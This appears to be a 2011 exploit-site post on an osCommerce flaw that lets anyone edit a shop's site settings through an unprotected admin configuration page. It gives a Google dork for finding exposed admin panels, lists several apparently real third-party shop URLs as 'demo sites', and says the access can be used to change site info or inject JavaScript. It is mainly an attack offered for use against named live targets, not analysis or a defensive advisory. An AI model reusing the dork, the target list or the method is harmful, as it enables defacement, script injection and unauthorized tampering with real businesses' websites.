osCommerce Remote Edit Site Info Vulnerability
View Code PHP
# Exploit Title:osCommerce Remote Edit Site Info Vulnerability # Date: 10/7/2011 # Author: Angel Injection # home Page: http://www.club-h.co.cc # Email: Angel-Injection[at]hotmail[Dot]com # Vendor or Software Link: www.oscommerce.com # Version: N/A # Category:: webapps # Google dork:intitle:"osCommerce" inurl:"/admin/configuration. php?" # Tested on: Linux Back Track 5 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> demo site http://montra.zdnic.com/admin/configuration.php http://goldenox.com/admin/configuration.php http://petsupplies.foryou.com.au/admin/configuration.php http://www.funpinswork.com/admin/configuration.php http://montra.zdnic.com/admin/configuration.php Exploit you can edit Site Info exm site name .... 0r You you can put the Java script -- ------ ---------- ----------- ------- ------------- ------- --------- ------ ---- Thanks to all the people of Iraq And Club Hack Team |
Trackback from your site.